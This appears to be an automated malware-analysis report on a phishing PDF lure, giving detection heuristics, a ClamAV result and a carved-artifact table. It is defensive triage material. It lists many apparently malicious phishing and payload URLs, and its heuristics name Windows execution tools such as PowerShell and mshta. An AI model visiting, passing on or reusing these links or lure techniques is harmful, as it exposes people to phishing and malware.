MALICIOUS
256
Risk Score
Malware Insights
MITRE ATT&CK
T1059.007 JavaScript
T1566.001 Spearphishing Attachment
The PDF contains an embedded JavaScript payload, indicated by the 'PDF_EMBEDDED_SCRIPT_PAYLOAD' heuristic. This script is designed to contact a remote URL, likely to download and execute a second-stage payload. The 'SE_LOLBIN_RUN_COMMAND' heuristic also suggests the presence of commands that could be used for execution. The ClamAV detection further confirms the malicious nature of the file.
Machine Learning
- Nyx PDF Classifier malicious score 0.9997
Heuristics 7
-
ClamAV: Pdf.Phishing.Trojan-d2568dad23a94d95-d2568dad23a94d95-10044375-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Pdf.Phishing.Trojan-d2568dad23a94d95-d2568dad23a94d95-10044375-0
-
Embedded script payload in PDF stream high PDF_EMBEDDED_SCRIPT_PAYLOADPDF stream bytes contain script execution markers such as ActiveXObject/CreateObject, WScript.Shell, PowerShell, or shell-exec primitives. This is stronger than ordinary PDF JavaScript because it indicates a staged external script payload hidden in stream bytes.
-
LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMANDExtracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
External URI info PDF_URIPDF contains an external URL action
-
Object number defined twice with different bodies info PDF_DUPLICATE_OBJ_BODY_INCREMENTALThe same indirect object (N G) is defined more than once with different body bytes. First-wins and last-wins readers will resolve different content, which is a parser-confusion shape used by targeted PDFs. Body-only differences are common in benign incremental updates, so severity is raised only when the duplicate carries active content.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://jacksth.ru/wix?keyword=photo+analysis+worksheet PDF link annotation
- http://com-signto6.xyz/verifone_p400_datasheetfmvwa.pdfIn PDF document text
- https://static.s123-cdn-static.com/uploads/4402711/normal_5fc8ea81b265f.pdfIn PDF document text
- http://hamlikjorettoop.ru/maplestory_2_assassin_awakening_guidep7b4h.pdfIn PDF document text
- https://cdn-cms.f-static.net/uploads/4468820/normal_6029d30d0d815.pdfIn PDF document text
- http://cookwellbakewell.com/cheat_engine_6._3_for_android_apkjsfau.pdfIn PDF document text
- http://vududodudo.22web.org/tamil_sad_background_music_free.pdfIn PDF document text
- http://kivudutamazawan.22web.org/42631470372.pdfIn macro / runtime command snippet
- http://vinnipoh.space/zetagetoragakajukrgp3e.pdfIn PDF document text
- https://cdn-cms.f-static.net/uploads/4410694/normal_6009c8c104009.pdfIn PDF document text
- http://www.ascendercorp.com/In PDF document text
- http://www.ascendercorp.com/typedesigners.htmlIn PDF document text
- https://s3.amazonaws.com/sesijesule/3_etoiles_guide_michelin_france.pdfIn PDF document text
- https://s3.amazonaws.com/wofaxil/27453112980.pdfIn PDF document text
- https://s3.amazonaws.com/kovezodepugov/kiss_the_rain_piano_sheet_music.pdfIn PDF document text
- https://s3.amazonaws.com/negonanopix/dalupa.pdfIn PDF document text
- https://s3.amazonaws.com/gedexim/achalpur_amravati_weather_report.pdfIn PDF document text
- https://s3.amazonaws.com/figidireki/95928766672.pdfIn PDF document text
- https://s3.amazonaws.com/fadupazageraf/confidentiality_agreement_sample_template.pdfIn PDF document text
- http://lafanibawonol.rf.gd/smtp_auth_clients_report_powershell.pdfIn PDF document text
- http://tixixumusugik.rf.gd/35182907560.pdfIn macro / runtime command snippet
- https://s3.amazonaws.com/jeduzizonox/16691065304.pdfIn macro / runtime command snippet
- https://s3.amazonaws.com/bisazabe/37203278393.pdfIn PDF document text
- http://mutifitiwexo.epizy.com/calibration_of_thermometer_lab_report.pdfIn PDF document text
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In PDF document text
- http://purl.org/dc/elements/1.1/In PDF document text
- http://ns.adobe.com/pdf/1.3/In PDF document text
- http://ns.adobe.com/xap/1.0/In PDF document text
- http://ns.adobe.com/xap/1.0/mm/In PDF document text
- http://ns.adobe.com/xap/1.0/rights/In PDF document text
- http://scripts.sil.org/OFLIn PDF document text
Extracted artifacts 3
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
embedded_pdf_script_0000987b.bin |
pdf-embedded-script | PDF decompressed stream script payload at offset 0x987B | 70150 bytes |
SHA-256: 3f0bd39e098aa4e6a0c4dbaf4e9b12de8be7f5f26fc5a02dd543f93ad39ad8e6 |
|||
|
Detection
ClamAV:
Pdf.Phishing.Trojan-d2568dad23a94d95-d2568dad23a94d95-10044375-0
Obfuscation or payload:
likely
Carved artifact contains 1 shell/COM execution token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
%PDF-1.4
1 0 obj
<<
/Title (�� P h o t o a n a l y s i s w o r k s h e e t)
/Creator (�� w k h t m l t o p d f 0 . 1 2 . 5)
/Producer (�� Q t 4 . 8 . 7)
/CreationDate (D:20210217222426+02'00')
>>
endobj
3 0 obj
<<
/Type /ExtGState
/SA true
/SM 0.02
/ca 1.0
/CA 1.0
/AIS false
/SMask /None>>
endobj
4 0 obj
[/Pattern /DeviceRGB]
endobj
6 0 obj
<<
/Type /XObject
/Subtype /Image
/Width 625
/Height 155
/BitsPerComponent 8
/ColorSpace /DeviceRGB
/Length 7 0 R
/Filter /DCTDecode
>>
stream
���� JFIF K K �� C
�� C �� � q " ��
�� � } !1A Qa "q 2��� #B�� R��$3br�
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz���������������������������������������������������������������������������
�� � w !1 AQ aq "2� B���� #3R� br�
$4�%� &'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz�������������������������������������������������������������������������� ? ���m> � �j�-�^;��y� �( ��? ѷ�?��nH�v�� �����r7`t�8� �����O` �� � �� �� y���� �p '� ��4�o�L�O� ��%� �� J�� {���ԏ�oÆ1�; �O��#�:���+��YB�' ����c�DH�UH m��=?,� ��} �� 5 �_ n'�0�S���R ��=}�$�.�� � `��� �ys���ӭtq!1�; �� g �E4� ������;�'������% >�8�
t �N���Ѿ�/ �q�q�z� J �?����i~R�?�� ���a�~;w<�HdB �2n�A� #� ���r�h�� ?6A�ю���E��s��{��� /3� �� E;��
�X � ��?�����O H|���� q)� ����� >���̀IU�2 ��z�ә6�9|0��� � -���W� �"V#LV�4� ���q��j� ��[� N-�v � � ��霞ݫ�D��<� �1�GN}�� �b0w ����}�S���߇aP~�Y� b�Q���� ���/�_
G 2X������GS������5�ot� +� �d���a� |�Ē@ '�`~������Q������S�׆��� �H9 ����D
<> ��/�n �[I��� �x��5ҍ���S���ۏ����eء� ����8 ��A6� -����;�Ҁ ;h��'��$}�� � �J� <?m *�� 973dd���<�ϥt� �<ec-�� ɥ��2 �8݁�x�)� ^�2z��N^ �~ �#� � 87 � ���jA�sÐ��� 4� ~�. S�ﯵu,䫰 �l� c4�%2 6Jd��g���n�ׯZ:
_ � ���| ���k���ŅĪ �}�g�sޟ �� #�:b�6�>|�3z��? ҺXܖ.0�y�s���>�� :I $��P���'��]�� tI������sR� ��a�=� 9�� d �g�n�/��
Ƌ i� <�;����`�K$��� à � �����#�] ������c�c��� $�)$��s�| ��dgN�
�'�2��< �x8�i �O�jPwi��|� ɀ9��{���@ȋʅ#����^ �?ZD�ڛ e �Lpz`���ti�-9|)i� ^�4� |9 Pt�K ��ɴ�>� tǥ?� � O�K���O�$���Nz �t ��Nr@� �<� >8� f � $ �n |�� �� AA��_���9��T~ ,�i��ۈ��� � ��� �> T*t� +� �^ s����# ��h �ךV�*FI?9�ۓ�s�
�.��m+�� � ��*? ���فX�O�/̀ 88�~���{��! M|��Ẽ g� k� �,F 5 t� �Cӿ��P �?�u p@��G� ��C;Kg�� �a~
xo�����H���i� ���� �� ��Ӂ]Ųg� >����q] w � X � O��K<EF�� ����?� ^(k[0Mr�D�n~ h22 ���ܳ5ğ/ �rzzq�jF�E�ߺ�j ��O >������f� ����P� �q��ҞH9#8Q� A ��ұJN����� �9�� �y�� Ļn�Fg���7֘� |3���S, � �����ֺ DO�� ��m
~l���c'� �f��
�� < ӷbT��t9��A�#)��T �G�$����7v {qҜ~ � �5Ә� ��Uq� }u ?C]/$ �� s� �Mh#��`Yq� �#�?� u y+E��s�� ��'N �< �� �� 9�/�O ���c |6V�Q� �큒x?�t�6� 3. X�x �y�8��~��t�n$ @$�' �k 3~H� � ��@ �� �af������i���Þ^ ïc4�<� �� � (1 ��m 8 >�烟��H$p[q� �[���s��w�� ����� [ շ� C��r��d ,� � 7P> x|�e�>�%@�Py���Y"\w(��I<� �)� ��ȕ ���H�����BI��r�m�������z/� X� v A�q*�`���4ؾ xu� N.c�sO),}G��t�ܼ�.��㜌� 8㿧on gWE`����#�N�G�K�i����f �� G�Ne %�$b� ;�����?�Q�q\��P�n7\I��պ~u�n;���N�9�J��Y�v� ӏO���X9�s�? � �Κs�� �HI9�����d�;�����e��k�Fs�8n>��К�d�y ˁ�:0���{ԑ N 9� s�4� �vO�����PxvY u��pC%���� ���5"| �� �< ���p~����� h��N� �^��97:
�r98�??���pZ���? |2��� ^y \K�p ���R���l��ӎv������q���>� �] �1�c ���n21�N ���PIݐ '�_^�ݺ� o�r���ÆUu� v >|�= �ϟ�� ^�| ���g��i\ $3� B?�� ��U % ��� �� ��mg� w eϘ� )>�>�O�
� '%�|��~_��|�� ��Kiۋ r'� r@ ?�n>��O�^ ��͎��P>�"� �c���OZ�(�� ��J���ӓ� .٦,{� �� :e��= r= �Q�
�� �����C�h�.� 0�g� �=9 {��Ԓ� ���b��(W �J@��.?�uҳ9�P!Q�F� ۏO���"*�l�` �rFy��Aڇm�)�=>��� c�� �G��#`�xÜ ��6�t
� ԇ�'��P>��� -4��� ����+� (� G�=������%PT���A� >ԍ]�] ���g4� |>�`�� ��ʼ.y�o|c��i��LJv��-��Sq7bq�|�P䌜 :� ��ҙB�Ir ����zQ� ����9�> �y��O��i�ī�� {�����9ᘔgN`1�ϗ � =��.8%�F�9�`,�C�( ��n�#8緦;b���+�� ��S��� p$ cΓ ����� �;�T Ӱ@� �`q�����Q�)�� ={� ��C�V$� �Ň�� s�qE�
�w#��� �&vΚ � ��^��p1�� �8�'Oo��D�K ��{�ֺC�E~� �� ���H<��`�6F ���Ǯ(� 3��� _y�C�g�v�,+�.��Qq 1��:t� ��� �O")ܣ� �>�w�����j�D�F>n�� ���E1�� �0�8 O �n?
v��|ܫ�+E��� s�� ��r NU2�w}�Rs�O����5~ �t O@ � � � NO��9��tł�b pz ����ɿ��� 8'wl�z��
... (truncated)
|
|||
font_00_sfnt_off0000d0e6.bin |
pdf-font-stream | PDF embedded font (sfnt) at offset 0xD0E6 | 5032 bytes |
SHA-256: 4883ef4fa1a3b9f4c45f65c07614391d6a04d0a3748d17860e24f7f8322aa47f |
|||
font_01_sfnt_off0000e213.bin |
pdf-font-stream | PDF embedded font (sfnt) at offset 0xE213 | 10296 bytes |
SHA-256: c6bb558a9cc3b364430074859fa80da065cbcb60350c0b8a9bc14e06c39c8fde |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.